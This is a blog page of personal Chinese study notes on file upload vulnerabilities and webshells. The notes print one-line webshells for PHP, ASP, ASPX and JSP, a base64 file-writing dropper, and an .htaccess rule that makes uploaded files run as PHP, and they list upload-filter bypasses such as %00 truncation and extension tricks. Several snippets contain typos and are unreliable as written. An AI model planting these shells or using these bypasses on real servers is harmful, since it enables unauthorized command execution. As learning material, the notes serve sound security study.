<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="文件上传木马特洛伊木马，寄宿在计算机了，非授权，远程控制程序，在计算机管理员我i发觉的情况下，开放系统权限给攻击者 后门一台计算机上有65535个端口，端口是计算机与外界连接的门，每个门都提供一些服务，利用这些服务，获得权限，给自己进入计算机里下一个后门 webshellasp php jsp cgj等网页文件形式存在的，一种命令执行环境，也叫网页木马后门，利用这个后门获得权限 分类文件大小分 一">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2024/10/08/top10/15%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="文件上传木马特洛伊木马，寄宿在计算机了，非授权，远程控制程序，在计算机管理员我i发觉的情况下，开放系统权限给攻击者 后门一台计算机上有65535个端口，端口是计算机与外界连接的门，每个门都提供一些服务，利用这些服务，获得权限，给自己进入计算机里下一个后门 webshellasp php jsp cgj等网页文件形式存在的，一种命令执行环境，也叫网页木马后门，利用这个后门获得权限 分类文件大小分 一">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-10-08T02:40:41.310Z">
<meta property="article:modified_time" content="2024-09-28T23:49:46.147Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-top10/15文件上传" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/10/08/top10/15%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" class="article-date">
  <time class="dt-published" datetime="2024-10-08T02:40:41.310Z" itemprop="datePublished">2024-10-08</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h1><h1 id="木马"><a href="#木马" class="headerlink" title="木马"></a>木马</h1><p>特洛伊木马，寄宿在计算机了，非授权，远程控制程序，在计算机管理员我i发觉的情况下，开放系统权限给攻击者</p>
<h1 id="后门"><a href="#后门" class="headerlink" title="后门"></a>后门</h1><p>一台计算机上有65535个端口，端口是计算机与外界连接的门，每个门都提供一些服务，利用这些服务，获得权限，给自己进入计算机里下一个后门</p>
<h1 id="webshell"><a href="#webshell" class="headerlink" title="webshell"></a>webshell</h1><p>asp php jsp cgj等网页文件形式存在的，一种命令执行环境，也叫网页木马后门，利用这个后门获得权限</p>
<h2 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h2><h4 id="文件大小分"><a href="#文件大小分" class="headerlink" title="文件大小分"></a>文件大小分</h4><ul>
<li>一句话木马</li>
<li>小马，只包含文件上传功能，体积小</li>
<li>大马，体积大，包含多功能，代码通常会加密隐藏</li>
</ul>
<h4 id="脚本类型分"><a href="#脚本类型分" class="headerlink" title="脚本类型分"></a>脚本类型分</h4><ul>
<li>jsp</li>
<li>asp</li>
<li>aspx</li>
<li>php</li>
</ul>
<h2 id="特点"><a href="#特点" class="headerlink" title="特点"></a>特点</h2><ul>
<li>动态脚本形式出现</li>
<li>穿越服务器防火墙，攻击者和服务器都是通过80端口传递</li>
<li>&#x3D;&#x3D;一般不会在系统日志留下记录，在web日志留下记录&#x3D;&#x3D;</li>
</ul>
<h2 id="利用流程"><a href="#利用流程" class="headerlink" title="利用流程"></a>利用流程</h2><ul>
<li>sql注入，文件上传，</li>
<li>获取权力</li>
</ul>
<h2 id="常见代码"><a href="#常见代码" class="headerlink" title="常见代码"></a>常见代码</h2><ul>
<li>php</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="number">2</span>]);<span class="meta">?&gt;</span><span class="comment">//GET可以换成post</span></span><br></pre></td></tr></table></figure>

<ul>
<li><p>小马</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fputs(fopen(“up,php”,w),’&lt;?php eval($_POST[‘cmd’]?&gt;))//写入一个文件</span><br></pre></td></tr></table></figure>

<p><code>fputs</code> 是 PHP 中的一个函数，用于将字符串写入文件。如果文件不存在，<code>fputs</code> 会尝试创建它。如果文件已经存在，<code>fputs</code> 会向文件末尾追加内容，除非指定了其他模式。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php fputs(fopen(base64_decode(shell.php的base64编码，怕被过滤)，w),base64_decode(base64_decode(php代码的两次base64编码，因为等号也会不被允许，不被url还是怎么着不知道哇)))	</span><br></pre></td></tr></table></figure>
</li>
<li><p>小马变大马</p>
</li>
</ul>
<p>​		上传一个写入一个新文件的 ，要进行上传文件的小马，用那个上传文件上传大马</p>
<p>php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> <span class="title function_ invoke__">fputs</span> ( resource <span class="variable">$handle</span> , <span class="keyword">string</span> <span class="variable">$string</span> [, <span class="keyword">int</span> <span class="variable">$length</span> ] )</span><br></pre></td></tr></table></figure>

<ul>
<li><code>$handle</code> 是一个有效的文件指针资源，通常通过 <code>fopen</code> 函数获得。</li>
<li><code>$string</code> 是要写入文件的字符串。</li>
<li><code>$length</code> 是可选参数，指定要写入的最大字节数。如果省略此参数，将写入整个字符串。</li>
</ul>
<p>返回值：</p>
<ul>
<li><p>成功时返回写入的字节数，失败时返回 <code>false</code>。</p>
</li>
<li><p>asp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%eval request(&#x27;pass&#x27;)%&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>aspx</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@Pace Language=&quot;Jscript&quot;%&gt;&lt;%eval(Request.Item[&#x27;pass&#x27;]%)</span><br></pre></td></tr></table></figure>

<ul>
<li><p>jsp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;%Runtime getRuntime().exec(request getparameter(&quot;i&quot;));%&gt;</span><br></pre></td></tr></table></figure></li>
</ul>
<h1 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h1><ul>
<li><p>是个可执行的脚本</p>
</li>
<li><p>$_get 啥的能够让我上传点东西</p>
</li>
<li><p>能让我执行上传的东西</p>
<ul>
<li><p>直接执行（eval  system  passthru）</p>
</li>
<li><p>文件包含执行（include require）</p>
</li>
<li><p>动态函数执行（$a&#x3D;“phpinfo”;$a();)</p>
</li>
<li><p>回调函数（array_map）</p>
</li>
</ul>
</li>
</ul>
<h1 id="什么是文件上传"><a href="#什么是文件上传" class="headerlink" title="什么是文件上传"></a>什么是文件上传</h1><p>客户端数据以文件形式封装，发送到服务器，服务器解释数据，最终在服务点硬盘上作为真实文件保存</p>
<h1 id="文件上传的检测方式"><a href="#文件上传的检测方式" class="headerlink" title="文件上传的检测方式"></a>文件上传的检测方式</h1><ul>
<li><p>文件扩展名，客户端js检测，前端</p>
</li>
<li><p>content-type 服务端MIME类型检测</p>
</li>
<li><p>path 服务端目录路径检测，上传到哪里</p>
</li>
<li><p>服务端文件扩展名检测，跟文件extension相关</p>
</li>
<li><p>服务端文件内容检测（检查内容是否含有恶意代码</p>
</li>
<li><p>客户端JS检测则是指在用户的浏览器上运行的JavaScript代码对文件上传进行的初步检查。例如，JavaScript可能会验证用户选择的文件扩展名是否在允许的列表中，或者文件大小是否超出限制。</p>
<p>服务端和客户端检测的主要区别在于它们运行的位置和目的。服务端检测是后端代码的一部分，它在服务器上执行，可以提供更安全的验证，因为不受客户端环境的影响。客户端检测则是在用户的设备上执行，通常用于提高用户体验，通过即时反馈减少不必要的服务器请求。</p>
</li>
</ul>
<h1 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h1><h6 id="绕过客户端检测"><a href="#绕过客户端检测" class="headerlink" title="绕过客户端检测"></a>绕过客户端检测</h6><ul>
<li>禁用js，火狐的noscript插件，有时候直接删除</li>
<li>用bp抓包并没有抓到还报错，那就是前端报错</li>
<li>把。php换成png然后抓包，就可以绕过了</li>
</ul>
<h5 id="绕过服务端"><a href="#绕过服务端" class="headerlink" title="绕过服务端"></a>绕过服务端</h5><ul>
<li><p>content-type的mime值改就行</p>
</li>
<li><p>后缀检测</p>
<ul>
<li><p>黑名单</p>
<ul>
<li><p>大小写绕过Php</p>
</li>
<li><p>空格绕过.php最后加一个空格</p>
</li>
<li><p>点绕过，.php.最后加一个点</p>
</li>
<li><p>：$DATAwindows里面适合</p>
</li>
<li><p>apache的解析漏洞，解析文件时从右往左，如aa.php.owf.rar  apache不能识别rar和owf就会解析成php文件</p>
</li>
<li><p>htaccess文件<br>分布式配置文件，hypertext access超文本入口，提供针对目录改变配置的方法，<br>即在一个特定的文档目录中放置一个包含一个或者多个指令的文件，以此作用与这个目录和他的所以子目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">新建一个htaccess文件</span><br><span class="line">&lt;FileMatch&quot;aaab&quot;&gt;//文件匹配</span><br><span class="line">SetHandler application/x-httpd-php//表示匹配到这个文件后当作php文件来处理，不论是什么文件，只要包含这个字符串，就会被当作php来处理</span><br><span class="line">&lt;/FileMatch&gt;</span><br></pre></td></tr></table></figure></li>
</ul>
</li>
<li><p>白名单</p>
<p>服务端判断文件类型从后往前，解析从前往后shell.php%00png<br>&#x2F;&#x2F;解析会是png，保存会解码从前往后截断，%00是个url编码</p>
</li>
</ul>
</li>
<li><p>文件内容</p>
<ul>
<li><p>文件格式幻数magic number，用来标记文件或者协议的格式，前十个字节，就是winhex打开，前几个字，</p>
</li>
<li><p>文件加载检测，调用服务器的api对文件进行加载，渲染，打乱编码但仍然显示图片，甚至有二次渲染<br>对渲染&#x2F;加载测试的攻击方式就是代码注入绕过</p>
<p>对二次渲染的攻击方式是攻击文件加载器自身，二次渲染会把属于图片的抓出来，非图片部分会被直接隔离开<br>溢出攻击对文件加载器进行攻击，上传自己的文件后，文件加载器会主动加载测试，测试时进行溢出攻击执行shellcode</p>
</li>
</ul>
</li>
</ul>
<h5 id="还有web解析漏洞"><a href="#还有web解析漏洞" class="headerlink" title="还有web解析漏洞"></a>还有web解析漏洞</h5><p>知道是哪个服务器再去找吧，不想看了</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/10/08/top10/15%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" data-id="cm1zvswpx0008rkas3i043kem" data-title="" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/10/08/top10/2%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2024/10/08/top10/14xss/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%88%91%E6%9C%8D%E4%BA%86%EF%BC%8C%E5%88%B0%E5%BA%95%E4%B8%BA%E4%BB%80%E4%B9%88%E6%B2%A1%E6%9C%89css/" rel="tag">我服了，到底为什么没有css</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/%E6%88%91%E6%9C%8D%E4%BA%86%EF%BC%8C%E5%88%B0%E5%BA%95%E4%B8%BA%E4%BB%80%E4%B9%88%E6%B2%A1%E6%9C%89css/" style="font-size: 10px;">我服了，到底为什么没有css</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/10/">October 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/07/">July 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/10/08/top10/%E6%88%91%E9%82%A3%E6%87%B5%E9%80%BC%E7%9A%84%E9%97%AE%E9%A2%98%E4%BB%AC/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/10/08/top10/%E5%87%BD%E6%95%B0/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/10/08/top10/SQL/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/10/08/top10/md5%E7%BB%95%E8%BF%87/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/10/08/top10/shctf/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>